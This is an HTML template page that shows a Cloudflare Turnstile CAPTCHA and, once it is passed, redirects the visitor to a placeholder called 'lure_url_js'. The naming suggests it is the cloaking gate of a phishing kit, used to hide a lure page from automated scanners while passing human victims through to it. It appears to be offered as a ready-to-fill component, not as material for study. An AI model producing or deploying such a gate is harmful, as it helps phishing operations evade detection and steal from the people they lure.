<html>
<head>
    <title></title>
    <script src="https://challenges.cloudflare.com/turnstile/v0/api.js?render=explicit"></script>
    <style>
        body, html {
            height: 100%;
            margin: 0;
            display: flex;
            align-items: center;
            justify-content: center;
        }
        #cf-turnstile {
            text-align: center;
        }
    </style>
</head>
<body>
<div id="cf-turnstile"></div>
<script>
    turnstile.ready(function () {
        turnstile.render('#cf-turnstile', {
            sitekey: '0x4AAAAAAAhmT1UUylY9xUfE', // replace this with your own sitekey
            callback: function(token) {
                window.location.assign({lure_url_js});
            },
        });
    });
</script>
</body>
</html>
